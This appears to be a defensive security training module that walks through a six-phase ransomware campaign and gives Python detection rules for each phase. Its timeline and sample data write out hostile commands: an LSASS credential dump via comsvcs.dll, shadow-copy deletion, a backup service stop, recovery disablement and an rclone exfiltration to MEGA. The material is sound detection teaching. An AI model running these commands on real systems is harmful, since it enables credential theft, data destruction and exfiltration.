Documented Campaigns — Ransomware Operations

6-8 hours · Module 1 · Free
What you already know

You've seen ransomware investigations and read incident reports. You know the general sequence: access, lateral movement, encryption. This section maps the exact six-phase operational pattern with detection opportunities at each phase, a detection priority stack that tells you which signal to invest in first, and the complete campaign timeline reconstructed from real-world incident data.

Scenario

The Conti playbook leaked in 2022 showed that their average time from initial access to ransomware deployment was 5 days. Their operators followed a documented procedure: Cobalt Strike beacon, AdFind for domain enumeration, LSASS dump with comsvcs.dll, lateral movement via SMB, backup deletion, then encryption. Knowing this procedure means that when you find the AdFind execution on day 2, you know what day 5 looks like, and you have 72 hours to prevent it.

The pattern is consistent because the economics are consistent

The specific tools vary across RaaS platforms and affiliates. The discovery commands vary. The lateral movement protocol varies. The operational sequence does not, because the sequence is dictated by economic logic, not personal preference. Encrypt as much as possible, destroy recovery options, exfiltrate data for double-extortion leverage, and complete all of it before the SOC responds. Sophos reports a median of 5 days from initial access to encryption in 2025, down from 9 days in 2022. Some affiliates compress to 24 hours. CrowdStrike measured a median breakout time of 62 minutes to first lateral movement.

The consistency gives defenders a prediction tool. Once you identify the current phase, the remaining phases are predictable. The attacker must follow the economic logic. They cannot skip credential access because they need domain admin privileges to deploy ransomware via Group Policy across the domain. They cannot skip backup destruction because the victim will not pay if they can restore from backup. In 2025, backup repositories were targeted in 96% of ransomware attacks and successfully compromised in 76% of those cases. Double extortion (data theft plus encryption) is now standard at 87% of ransomware attacks, which is why data exfiltration to consumer cloud storage has become a mandatory step before encryption.

The M-Trends 2026 case involving UNC1543 and UNC2165 illustrates the speed. Roughly 70 minutes elapsed between the initial FAKEUPDATES JavaScript downloader infection (delivered by the IAB) and UNC2165's earliest interactive activity. The secondary operator destroyed backups and deployed RansomHub ransomware across Windows and virtual management servers. The entire sequence from initial infection to ransomware deployment completed within the same operational window.

The six-phase ransomware campaign

The timeline below reconstructs a complete ransomware campaign at Northgate Engineering, from broker access activation through encryption, with five detection opportunities before the final phase.

SIX PHASES — FIVE DETECTION WINDOWS BEFORE ENCRYPTION

1. ACCESS        T+0         Dormant account        Window 1 ◆
2. DISCOVERY     T+1hr       Recon burst            Window 2 ◆
3. CREDENTIALS   T+2-6hr     POINT OF NO RETURN     Window 3 ◆◆◆
4. LATERAL       T+6-24hr    8 systems / 17 min     Window 4 ◆
5. STAGING       T+24-48hr   Backups + exfil        Window 5 (LAST) ◆
6. ENCRYPTION    T+48-72hr   TOO LATE               Contain only

← PREVENTABLE (Phases 1-5: single-endpoint to domain-wide remediation) → DAMAGE

DETECTION INVESTMENT PRIORITY: Phase 3 (credential access) — highest ROI, lowest false positive rate.
Before Phase 3: one endpoint. After Phase 3: every domain-joined system.

Five detection windows exist before encryption. Phase 3 (credential access) is the inflection point: everything before it is single-endpoint remediation; everything after requires domain-wide response.

Timeline
RANSOMWARE CAMPAIGN — Northgate Engineering (48-72 hours)
PHASE 1 — INITIAL ACCESS (T+0)
  Mon 09:14  svc-backup@northgateeng.com authenticates via VPN
             Last sign-in: 58 days ago. IP: residential proxy.
             No MFA — service account excluded from Conditional Access.
             Detection window 1: dormant account activation.
PHASE 2 — DISCOVERY (T+1 hour)
  Mon 09:14  whoami /all
  Mon 09:14  net group "Domain Admins" /domain
  Mon 09:14  nltest /dclist:northgateeng
  Mon 09:15  net share
  Mon 09:15  systeminfo
  Mon 09:15  wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct
             Six commands in 106 seconds. Each legitimate individually.
             Detection window 2: temporal density of recon commands.
PHASE 3 — CREDENTIAL ACCESS (T+2-6 hours)
  Mon 11:30  rundll32.exe comsvcs.dll,MiniDump 672 C:\Users\Public\tmp.dmp
             LSASS memory dump via LOLBin. Domain admin credential harvested.
             Detection window 3: comsvcs.dll MiniDump — zero false positives.
             THIS IS THE POINT OF NO RETURN.
PHASE 4 — LATERAL MOVEMENT (T+6-24 hours)
  Mon 18:30  admin.lab → SRV-NGE-DC01   (domain controller)
  Mon 18:32  admin.lab → SRV-NGE-DC02   (domain controller)
  Mon 18:35  admin.lab → SRV-NGE-BKP01  (backup server)
  Mon 18:37  admin.lab → SRV-NGE-BKP02  (backup server)
  Mon 18:40  admin.lab → SRV-NGE-FS01   (file server)
  Mon 18:42  admin.lab → SRV-NGE-FS02   (file server)
  Mon 18:45  admin.lab → SRV-NGE-SQL01  (database)
  Mon 18:47  admin.lab → SRV-NGE-APP01  (application)
             Eight systems in 17 minutes. DCs first (deployment),
             then backups (disable recovery), then file servers (exfil).
             Detection window 4: lateral movement velocity.
PHASE 5 — STAGING (T+24-48 hours)
  Tue 21:30  vssadmin delete shadows /all /quiet   (backup server)
  Tue 21:30  wmic shadowcopy delete                (backup server)
  Tue 21:30  sc stop veeam                         (backup server)
  Tue 21:31  bcdedit /set recoveryenabled No       (all targets)
  Tue 21:35  rclone sync \\FS01\Finance\ mega:exfil/  (47 GB exfiltration)
             Detection window 5: shadow copy deletion + backup service stop.
             Zero false positive rate. LAST CONTAINMENT WINDOW.
PHASE 6 — ENCRYPTION (T+48-72 hours)
  Wed 22:15  GPO deploys encrypt.exe across 340 endpoints
             Encryption runs uncontested until Thursday morning.
             Detection here is damage mitigation, not prevention.

Phase analysis: where detection succeeds and fails

Phase 1 (dormant account activation) is detectable but requires a baseline of normal sign-in patterns. The detection query compares today's successful authentications against the past 60 days and flags accounts with no prior activity. The challenge is that many environments have service accounts that authenticate intermittently by design, so this detection needs tuning. The signal-to-noise ratio improves when combined with the source IP analysis (is it a known service endpoint or a residential proxy?) and the authentication protocol check (is it the expected protocol for this service account?). Service accounts authenticating via interactive logon from a residential IP address are never legitimate.

The dormant account pattern is common because IABs establish access and then go quiet while the listing sits on a marketplace. The gap between the broker's last activity and the affiliate's first activity may be weeks. Your SIEM has both events, separated by silence. The connection is visible only in retrospective analysis.
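The Phase 1 rule described above, written out as an added example (this is not the course's own query and not a vendor product rule). It compares each successful sign-in today against a 60-day baseline, then adds the two corroborating checks the text calls for: source IP against known service ranges, and logon type against what the account is expected to use. The sign-in records, the internal ranges, and the expected-logon table are all constructed here for the illustration.

```python
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

BASELINE_DAYS = 60

# Constructed sample sign-in records (not real telemetry). Fields mirror the
# shape of an identity-provider sign-in log.
SIGNINS = [
    {"account": "svc-backup",  "ts": "2025-12-18T03:00:00", "ip": "10.20.0.15",   "logon": "Service",     "success": True},
    {"account": "svc-monitor", "ts": "2026-02-01T03:00:00", "ip": "10.20.0.16",   "logon": "Service",     "success": True},
    {"account": "jdoe",        "ts": "2026-02-27T08:50:00", "ip": "10.20.1.40",   "logon": "Interactive", "success": True},
    {"account": "svc-monitor", "ts": "2026-03-01T03:00:00", "ip": "10.20.0.16",   "logon": "Service",     "success": True},
    {"account": "jdoe",        "ts": "2026-03-02T08:55:00", "ip": "10.20.1.40",   "logon": "Interactive", "success": True},
    {"account": "svc-backup",  "ts": "2026-03-02T09:14:00", "ip": "203.0.113.77", "logon": "Interactive", "success": True},
    {"account": "svc-monitor", "ts": "2026-03-02T09:20:00", "ip": "10.20.0.16",   "logon": "Service",     "success": True},
    {"account": "svc-backup",  "ts": "2026-03-02T09:30:00", "ip": "203.0.113.77", "logon": "Interactive", "success": False},
]

# Assumed environment facts: internal ranges that host known service endpoints,
# and the logon type each service account is expected to use.
KNOWN_SERVICE_NETS = [ip_network("10.20.0.0/16")]
EXPECTED_LOGON = {"svc-backup": "Service", "svc-monitor": "Service"}


def _parse(ts):
    return datetime.fromisoformat(ts)


def dormant_account_alerts(signins, now, baseline_days=BASELINE_DAYS):
    """Return one alert per successful sign-in today by an account that had no
    successful sign-in during the preceding baseline window. Each alert lists
    the corroborating factors (source IP outside known service ranges, logon
    type differing from the account's expected one)."""
    now = _parse(now)
    window_start = now - timedelta(days=baseline_days)
    alerts = []
    for ev in signins:
        t = _parse(ev["ts"])
        if not ev["success"] or t.date() != now.date():
            continue
        prior = [e for e in signins
                 if e["account"] == ev["account"] and e["success"]
                 and window_start <= _parse(e["ts"]) < t]
        if prior:
            continue  # account was active inside the baseline; not dormant
        factors = ["dormant: no successful sign-in in %d days" % baseline_days]
        src = ip_address(ev["ip"])
        if not any(src in net for net in KNOWN_SERVICE_NETS):
            factors.append("source IP outside known service ranges")
        expected = EXPECTED_LOGON.get(ev["account"])
        if expected and ev["logon"] != expected:
            factors.append("logon type %s, expected %s" % (ev["logon"], expected))
        alerts.append({"account": ev["account"], "ts": ev["ts"],
                       "severity": "high" if len(factors) == 3 else "medium",
                       "factors": factors})
    return alerts


if __name__ == "__main__":
    for a in dormant_account_alerts(SIGNINS, "2026-03-02T23:59:00"):
        print(a["severity"], a["account"], a["ts"], "; ".join(a["factors"]))
```

The dormancy check alone produces the noise the text warns about (intermittent service accounts); the severity only reaches "high" when all three factors line up, which is the combination the Northgate timeline shows.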

Phase 2 (discovery burst) has a high detection rate when you look for temporal density: four or more enumeration tools (whoami, net.exe, nltest, systeminfo, wmic) on the same endpoint within a five-minute window. Each individual command is legitimate. IT administrators run these daily. The discriminator is the burst pattern: six commands in 106 seconds from an account that has never run them before. The query is simple, the false positive rate is manageable with an allowlist for known admin workstations, and the detection fires within the first hour.
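An added example of the temporal-density rule (not the course's own query): it slides a five-minute window over process-creation events per host and account, fires when four or more distinct enumeration tools appear in the window, and suppresses hosts on an allowlist of admin workstations. The events, host names and allowlist are constructed to mirror the Northgate timeline.

```python
from collections import defaultdict
from datetime import datetime, timedelta

ENUM_TOOLS = {"whoami.exe", "net.exe", "net1.exe", "nltest.exe", "systeminfo.exe", "wmic.exe"}
WINDOW = timedelta(minutes=5)
MIN_DISTINCT = 4
# Assumed allowlist of known admin workstations.
ADMIN_HOSTS_ALLOWLIST = {"WS-ADMIN-01"}

# Constructed sample process-creation events (not real telemetry):
# (host, account, timestamp, image name, command line).
EVENTS = [
    ("WS-NGE-117", "svc-backup", "2026-03-02T09:14:05", "whoami.exe", "whoami /all"),
    ("WS-NGE-117", "svc-backup", "2026-03-02T09:14:21", "net.exe", 'net group "Domain Admins" /domain'),
    ("WS-NGE-117", "svc-backup", "2026-03-02T09:14:48", "nltest.exe", "nltest /dclist:northgateeng"),
    ("WS-NGE-117", "svc-backup", "2026-03-02T09:15:10", "net.exe", "net share"),
    ("WS-NGE-117", "svc-backup", "2026-03-02T09:15:30", "systeminfo.exe", "systeminfo"),
    ("WS-NGE-117", "svc-backup", "2026-03-02T09:15:51", "wmic.exe", "wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct"),
    # The same commands spread over an afternoon on a normal workstation: no burst.
    ("WS-NGE-042", "jdoe", "2026-03-02T13:02:00", "whoami.exe", "whoami"),
    ("WS-NGE-042", "jdoe", "2026-03-02T13:40:00", "net.exe", "net share"),
    ("WS-NGE-042", "jdoe", "2026-03-02T14:55:00", "systeminfo.exe", "systeminfo"),
    ("WS-NGE-042", "jdoe", "2026-03-02T16:10:00", "nltest.exe", "nltest /dclist:northgateeng"),
    # A burst on an allowlisted admin workstation: suppressed by the allowlist.
    ("WS-ADMIN-01", "itadmin", "2026-03-02T10:00:00", "whoami.exe", "whoami /all"),
    ("WS-ADMIN-01", "itadmin", "2026-03-02T10:00:30", "net.exe", "net share"),
    ("WS-ADMIN-01", "itadmin", "2026-03-02T10:01:00", "nltest.exe", "nltest /dclist:northgateeng"),
    ("WS-ADMIN-01", "itadmin", "2026-03-02T10:01:30", "systeminfo.exe", "systeminfo"),
]


def discovery_bursts(events, window=WINDOW, min_distinct=MIN_DISTINCT,
                     allowlist=ADMIN_HOSTS_ALLOWLIST):
    """Group enumeration-tool launches by (host, account); for each start event,
    collect everything inside `window` and fire once when the group holds
    >= min_distinct distinct tools. Returns one alert per host/account."""
    by_key = defaultdict(list)
    for host, account, ts, image, cmd in events:
        if image.lower() in ENUM_TOOLS and host not in allowlist:
            by_key[(host, account)].append((datetime.fromisoformat(ts), image.lower(), cmd))
    alerts = []
    for (host, account), rows in by_key.items():
        rows.sort()
        for i, (t0, _, _) in enumerate(rows):
            burst = [r for r in rows[i:] if r[0] - t0 <= window]
            tools = {r[1] for r in burst}
            if len(tools) >= min_distinct:
                alerts.append({
                    "host": host, "account": account,
                    "first": t0.isoformat(),
                    "tools": sorted(tools),
                    "commands": len(burst),
                    "span_seconds": int((burst[-1][0] - t0).total_seconds()),
                })
                break  # one alert per host/account
    return alerts


if __name__ == "__main__":
    for a in discovery_bursts(EVENTS):
        print(a["host"], a["account"], a["commands"], "commands in",
              a["span_seconds"], "s:", ", ".join(a["tools"]))
```

Counting distinct tools rather than raw command count is what keeps an administrator who runs `net share` ten times in a row from tripping the rule; the allowlist handles the workstations where bursts are routine.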

Phase 3 (credential access) is the highest-priority detection investment because it is the inflection point of the entire campaign. Before credential access, the attacker controls one account on one endpoint. After credential access with domain admin credentials, the attacker can deploy to every domain-joined system. The comsvcs.dll MiniDump technique targeting LSASS has a near-zero false positive rate because there is no legitimate reason for this command in production. Mimikatz, procdump targeting LSASS, and DCSync (replicating Active Directory credential data via DRSUAPI) are equally high-confidence indicators.

The detection surface for credential access is rich. Sysmon Event 10 (Process Access) with GrantedAccess values of 0x1010 or 0x1FFFFF against lsass.exe catches LSASS memory reads regardless of which tool performs them. Kerberoasting generates Event 4769 with encryption type 0x17 (RC4) for service accounts, detectable through a KQL query correlating ticket requests with non-standard encryption types. DCSync generates Event 4662 with the Replicating Directory Changes rights (GUID 1131f6aa-...), which is never requested by normal domain operations.

If you could invest in only one ransomware detection rule, target credential access. Stopping the campaign before the attacker obtains domain admin credentials limits the blast radius to a single endpoint. Stopping it after means domain-wide remediation.
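An added example covering the three credential-access signals named above (LSASS memory reads via Sysmon Event 10, Kerberoasting via Event 4769, DCSync via Event 4662); it is not the course's own rule set. Events are constructed and normalised to plain dictionaries. The EDR sensor path and the domain-controller machine accounts in the allowlists are assumptions; the GrantedAccess masks and the RC4 encryption type come from the text, and the replication GUID is the well-known DS-Replication-Get-Changes control access right.

```python
from collections import defaultdict

# Sysmon Event 10 GrantedAccess masks named in the text; 0x0010 is the
# PROCESS_VM_READ bit that any memory read of LSASS requires.
LSASS_READ_MASKS = {0x1010, 0x1FFFFF}
PROCESS_VM_READ = 0x0010
RC4_HMAC = 0x17
# DS-Replication-Get-Changes control access right GUID.
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
# Assumed: the EDR sensor is the only process allowed to read LSASS, and only
# domain controllers' machine accounts may replicate directory changes.
LSASS_SOURCE_ALLOWLIST = {r"C:\Program Files\EDR\sensor.exe"}
REPLICATION_ALLOWLIST = {"SRV-NGE-DC01$", "SRV-NGE-DC02$"}
KERBEROAST_MIN_SPNS = 3  # assumed threshold for one account requesting RC4 tickets

# Constructed sample events (not real telemetry).
EVENTS = [
    {"id": 10, "host": "WS-NGE-117", "src": r"C:\Program Files\EDR\sensor.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1010"},
    {"id": 10, "host": "WS-NGE-117", "src": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1FFFFF"},
    {"id": 10, "host": "WS-NGE-117", "src": r"C:\Windows\explorer.exe",
     "target": r"C:\Windows\System32\svchost.exe", "access": "0x1FFFFF"},
    {"id": 4769, "account": "svc-backup", "service": "svc-sql", "etype": "0x17"},
    {"id": 4769, "account": "svc-backup", "service": "svc-web", "etype": "0x17"},
    {"id": 4769, "account": "svc-backup", "service": "svc-sharepoint", "etype": "0x17"},
    {"id": 4769, "account": "jdoe", "service": "SRV-NGE-FS01$", "etype": "0x17"},  # machine account
    {"id": 4769, "account": "jdoe", "service": "svc-sql", "etype": "0x12"},        # AES ticket
    {"id": 4662, "account": "SRV-NGE-DC02$",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "account": "admin.lab",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def lsass_access_alerts(events):
    """Sysmon 10: any non-allowlisted process opening lsass.exe with a
    read-capable access mask."""
    out = []
    for e in events:
        if e["id"] != 10 or not e["target"].lower().endswith("\\lsass.exe"):
            continue
        access = int(e["access"], 16)
        if (access in LSASS_READ_MASKS or access & PROCESS_VM_READ) \
           and e["src"] not in LSASS_SOURCE_ALLOWLIST:
            out.append({"phase": 3, "technique": "lsass-read", "host": e["host"],
                        "src": e["src"], "access": hex(access)})
    return out


def kerberoast_alerts(events, min_spns=KERBEROAST_MIN_SPNS):
    """4769: RC4 service tickets for user (non-machine) service accounts,
    grouped by requesting account."""
    spns = defaultdict(set)
    for e in events:
        if e["id"] == 4769 and int(e["etype"], 16) == RC4_HMAC \
           and not e["service"].endswith("$") and e["service"].lower() != "krbtgt":
            spns[e["account"]].add(e["service"])
    return [{"phase": 3, "technique": "kerberoast", "account": a, "spns": sorted(s)}
            for a, s in spns.items() if len(s) >= min_spns]


def dcsync_alerts(events):
    """4662: replication rights exercised by anything other than a DC."""
    return [{"phase": 3, "technique": "dcsync", "account": e["account"]}
            for e in events
            if e["id"] == 4662 and REPL_GET_CHANGES in e["properties"].lower()
            and e["account"] not in REPLICATION_ALLOWLIST]


def credential_access_alerts(events):
    return lsass_access_alerts(events) + kerberoast_alerts(events) + dcsync_alerts(events)


if __name__ == "__main__":
    for a in credential_access_alerts(EVENTS):
        print(a)
```

Each function keys on the single field that distinguishes the technique (access mask, encryption type, replication right), which is why these rules carry the low false positive rate the text describes; the allowlists are the only tuning they need.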

Phase 4 (lateral movement velocity) produces a campaign-level signal: one account authenticating to five or more systems via network logon within a short window. The targeting pattern itself is diagnostic: domain controllers first (gaining deployment capability), then backup servers (destroying recovery options), then file servers (staging data for exfiltration). This is not how IT administrators work. Administrators authenticate to one or two servers for specific tasks.

An account touching eight servers in 17 minutes with the specific sequence of DC-backup-file is a ransomware pre-deployment pattern. The velocity is the discriminator: legitimate administrative work spreads across a workday. Ransomware lateral movement compresses into minutes because the attacker is racing against detection. Cross-referencing Phase 4 lateral movement with Phase 3 credential access (the same account that dumped LSASS is now authenticating to eight servers) produces a compound signal with the highest confidence of any ransomware detection rule.
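An added example of the velocity rule and the compound signal described in the two paragraphs above (not the course's own query). It groups network logons (type 3) by account, fires when one account reaches five or more distinct hosts inside 30 minutes, checks whether the roles were touched in DC, backup, file order, and raises confidence when the account already has a Phase 3 hit. The logon events, the host-to-role map and the set of Phase 3 accounts are constructed to mirror the Northgate timeline.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)   # "in under 30 minutes" from the priority stack
MIN_SYSTEMS = 5                  # "five or more systems"
NETWORK_LOGON = 3                # Windows logon type 3 (network)

# Assumed host-to-role map, the kind of data a CMDB or AD OU layout provides.
HOST_ROLES = {
    "SRV-NGE-DC01": "dc", "SRV-NGE-DC02": "dc",
    "SRV-NGE-BKP01": "backup", "SRV-NGE-BKP02": "backup",
    "SRV-NGE-FS01": "file", "SRV-NGE-FS02": "file",
    "SRV-NGE-SQL01": "db", "SRV-NGE-APP01": "app",
}
PRE_DEPLOYMENT_ORDER = ("dc", "backup", "file")

# Constructed sample 4624 logon events (not real telemetry):
# (timestamp, account, target host, logon type).
LOGONS = [
    ("2026-03-02T18:30:00", "admin.lab", "SRV-NGE-DC01", 3),
    ("2026-03-02T18:32:00", "admin.lab", "SRV-NGE-DC02", 3),
    ("2026-03-02T18:35:00", "admin.lab", "SRV-NGE-BKP01", 3),
    ("2026-03-02T18:37:00", "admin.lab", "SRV-NGE-BKP02", 3),
    ("2026-03-02T18:40:00", "admin.lab", "SRV-NGE-FS01", 3),
    ("2026-03-02T18:42:00", "admin.lab", "SRV-NGE-FS02", 3),
    ("2026-03-02T18:45:00", "admin.lab", "SRV-NGE-SQL01", 3),
    ("2026-03-02T18:47:00", "admin.lab", "SRV-NGE-APP01", 3),
    # A normal administrative day: two servers, hours apart.
    ("2026-03-02T08:10:00", "itadmin", "SRV-NGE-FS01", 3),
    ("2026-03-02T15:45:00", "itadmin", "SRV-NGE-APP01", 3),
    # Interactive logons (type 2) are not network logons and are ignored here.
    ("2026-03-02T18:50:00", "jdoe", "WS-NGE-042", 2),
]

# Accounts already raised by a Phase 3 rule; constructed to match the timeline.
PHASE3_ACCOUNTS = {"admin.lab"}


def role_sequence(hosts):
    """Order in which server roles are first touched, e.g. ['dc', 'backup', 'file']."""
    seq = []
    for h in hosts:
        role = HOST_ROLES.get(h, "other")
        if role not in seq:
            seq.append(role)
    return seq


def lateral_velocity_alerts(logons, phase3_accounts=frozenset(),
                            window=WINDOW, min_systems=MIN_SYSTEMS):
    """One alert per account whose network logons reach >= min_systems distinct
    hosts inside `window`. Confidence rises when the role order is DC, backup,
    file, and again when the account already has a Phase 3 credential-access hit."""
    per_account = defaultdict(list)
    for ts, account, host, logon_type in logons:
        if logon_type == NETWORK_LOGON:
            per_account[account].append((datetime.fromisoformat(ts), host))
    alerts = []
    for account, rows in per_account.items():
        rows.sort()
        for i, (t0, _) in enumerate(rows):
            burst = [r for r in rows[i:] if r[0] - t0 <= window]
            hosts = []
            for _, h in burst:
                if h not in hosts:
                    hosts.append(h)
            if len(hosts) < min_systems:
                continue
            seq = role_sequence(hosts)
            ordered = [r for r in seq if r in PRE_DEPLOYMENT_ORDER] == list(PRE_DEPLOYMENT_ORDER)
            compound = account in phase3_accounts
            alerts.append({
                "account": account,
                "systems": hosts,                      # doubles as the isolation scope
                "minutes": int((burst[-1][0] - t0).total_seconds() // 60),
                "role_sequence": seq,
                "dc_backup_file_order": ordered,
                "confidence": "critical" if compound else ("high" if ordered else "medium"),
            })
            break  # one alert per account
    return alerts


if __name__ == "__main__":
    for a in lateral_velocity_alerts(LOGONS, PHASE3_ACCOUNTS):
        print(a["confidence"], a["account"], len(a["systems"]), "systems in",
              a["minutes"], "min; roles:", " -> ".join(a["role_sequence"]))
```

The `systems` list in the alert is the set a responder would need to isolate if Phase 5 later fires for the same account, so the rule output is useful for containment as well as for detection.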

Phase 5 (backup destruction and staging) is the last realistic containment window. Shadow copy deletion (vssadmin delete shadows), backup service termination (sc stop veeam), and recovery environment disablement (bcdedit /set recoveryenabled No) are never legitimate in production outside of documented maintenance windows. The false positive rate is zero when correlated with the preceding phases. If Phase 5 fires and you have not already contained the threat from Phases 2-4, network-isolate every system the compromised account has touched. Encryption follows within hours. Data exfiltration to consumer cloud storage (MEGA, Dropbox, OneDrive for personal accounts) typically runs in parallel with backup destruction, providing the double-extortion leverage.
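An added example of the Phase 5 rule (not the course's own detection content). It normalises command lines, matches the backup-destruction commands and the consumer-cloud rclone sync named above, and suppresses destruction hits that fall inside a documented maintenance window for that host, which is the one exception the text allows. The command-line events and the maintenance window are constructed; the Veeam service name pattern is an assumption.

```python
import re
from datetime import datetime

# Patterns for the commands named in the text, applied to normalised command lines.
DESTRUCTION_RULES = [
    ("shadow-copy-delete",  re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b")),
    ("shadow-copy-delete",  re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b")),
    ("backup-service-stop", re.compile(r"\bsc(\.exe)?\s+stop\s+veeam\S*")),  # assumed service naming
    ("recovery-disable",    re.compile(r"\bbcdedit(\.exe)?\s+/set\s+(\{\w+\}\s+)?recoveryenabled\s+no\b")),
]
# rclone transfers to the consumer cloud remotes named in the text.
EXFIL_RULE = re.compile(r"\brclone(\.exe)?\s+(sync|copy|move)\b.*\b(mega|dropbox|onedrive)\S*:")

# Constructed sample command-line events (not real telemetry):
# (timestamp, host, account, command line).
EVENTS = [
    ("2026-03-01T02:05:00", "SRV-NGE-BKP01", "bkpadmin",  "vssadmin delete shadows /for=C: /oldest"),
    ("2026-03-03T21:30:00", "SRV-NGE-BKP01", "admin.lab", "vssadmin  delete shadows /all /quiet"),
    ("2026-03-03T21:30:10", "SRV-NGE-BKP01", "admin.lab", "WMIC shadowcopy delete"),
    ("2026-03-03T21:30:20", "SRV-NGE-BKP01", "admin.lab", "sc stop VeeamBackupSvc"),
    ("2026-03-03T21:31:00", "SRV-NGE-FS01",  "admin.lab", "bcdedit /set {default} recoveryenabled No"),
    ("2026-03-03T21:35:00", "SRV-NGE-FS01",  "admin.lab", r'rclone sync "\\FS01\Finance\" mega:exfil/'),
    ("2026-03-03T10:00:00", "SRV-NGE-BKP02", "bkpadmin",  "vssadmin list shadows"),
    ("2026-03-03T10:01:00", "SRV-NGE-BKP02", "bkpadmin",  "sc query VeeamBackupSvc"),
]
# Assumed documented maintenance window (change record) for one backup server.
MAINTENANCE = [{"host": "SRV-NGE-BKP01",
                "start": "2026-03-01T01:00:00", "end": "2026-03-01T04:00:00"}]


def normalise(cmd):
    """Lower-case, strip quotes, collapse whitespace so pattern matching is stable."""
    return re.sub(r"\s+", " ", cmd.replace('"', "").replace("'", "")).strip().lower()


def in_maintenance(host, ts, windows):
    t = datetime.fromisoformat(ts)
    return any(w["host"] == host
               and datetime.fromisoformat(w["start"]) <= t <= datetime.fromisoformat(w["end"])
               for w in windows)


def staging_alerts(events, maintenance=MAINTENANCE):
    """Return every Phase 5 hit. Destruction hits inside a maintenance window are
    kept but marked suppressed; exfiltration hits are never suppressed."""
    alerts = []
    for ts, host, account, cmd in events:
        norm = normalise(cmd)
        hits = [(cat, True) for cat, rx in DESTRUCTION_RULES if rx.search(norm)]
        if EXFIL_RULE.search(norm):
            hits.append(("cloud-exfil", False))
        for category, suppressible in hits:
            alerts.append({"ts": ts, "host": host, "account": account,
                           "category": category, "command": cmd,
                           "suppressed": suppressible and in_maintenance(host, ts, maintenance)})
    return alerts


def containment_required(alerts):
    """True when any unsuppressed destruction hit exists: the last containment window."""
    return any(a["category"] != "cloud-exfil" and not a["suppressed"] for a in alerts)


if __name__ == "__main__":
    found = staging_alerts(EVENTS)
    for a in found:
        print("SUPPRESSED" if a["suppressed"] else "ALERT", a["ts"], a["host"],
              a["account"], a["category"], "|", a["command"])
    print("containment required:", containment_required(found))
```

Suppressed hits are returned rather than dropped so an analyst can still see that a destructive command ran during the change window; the exfiltration pattern is deliberately excluded from suppression because no maintenance task syncs a finance share to a personal cloud account.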

The detection priority stack

Analyst Decision

Priority 1 — Credential access (T+2-6h): LSASS dump, Kerberoasting, DCSync. Highest confidence, lowest false positive rate. Stops the campaign before the attacker gains domain admin. Deploy detection for comsvcs.dll MiniDump, procdump.exe targeting LSASS, and Sysmon Event 10 with GrantedAccess 0x1010 against lsass.exe.

Priority 2 — Discovery burst (T+1h): Four or more enumeration tools on the same endpoint within 5 minutes. Earliest possible signal. Higher false positive rate than credential access (IT admins run these commands legitimately), but the temporal density is the discriminator.

Priority 3 — Lateral movement velocity (T+6-24h): One account authenticating to 5 or more systems via network logon in under 30 minutes. Campaign-level signal. Combine with credential access detection for highest confidence.

Priority 4 — Backup destruction (T+24-48h): Shadow copy deletion, backup service stops, recovery disablement. Zero false positives. Last containment window. If this fires, encryption is imminent.

Priority 5 — Dormant account (T+0): Requires a 60-day baseline of normal sign-in patterns. Lowest priority because it has the highest false positive rate (intermittent service accounts) but provides the earliest possible detection if tuned correctly.

Five detection windows exist before encryption begins. If you reach Phase 6, you missed 48-72 hours of detectable activity. The priority stack tells you where to invest limited detection engineering resources for maximum impact against the most common attack pattern in the current threat landscape.

The economic argument for investing in Phases 2-3 over Phase 5 is clear. Detecting and containing at Phase 2 (discovery burst) costs one endpoint remediation. Detecting at Phase 3 (credential access) costs one endpoint plus credential rotation. Detecting at Phase 5 (backup destruction) costs domain-wide incident response, because by that point the attacker has domain admin credentials and has touched eight or more systems.

The cost of remediation increases exponentially with each phase you miss. The detection engineering investment in early phases has the highest return on investment because it reduces the remediation scope by orders of magnitude.

Detecting ransomware by detecting the ransomware binary

The SOC's primary ransomware detection is an EDR signature for known ransomware executables. The signature fires when encrypt.exe executes in Phase 6, 48-72 hours after initial access. By that point, backups are destroyed, data is exfiltrated, and encryption is deploying across 340 endpoints via GPO. The signature catches the ransomware. It does not prevent the damage. Five detection opportunities existed before the binary ever ran. Each of the preceding phases produced telemetry that was available in the SIEM and not correlated into a campaign signal.

Offensive Operations Principle

Ransomware campaigns follow a predictable six-phase sequence because the economic logic is consistent: gain access, harvest credentials, move laterally, destroy backups, exfiltrate, encrypt. Five detection windows exist before encryption begins. Credential access (Phase 3) is the highest-priority detection investment because it is the point of no return. Everything before Phase 3 is recoverable with a single endpoint remediation. Everything after requires domain-wide response.

Next
Section 1.11: Documented Campaigns — Espionage and Supply Chain. The same operational framework applied to campaigns with intelligence and access objectives. Longer timelines, quieter operations, and detection challenges that require completely different approaches from ransomware detection.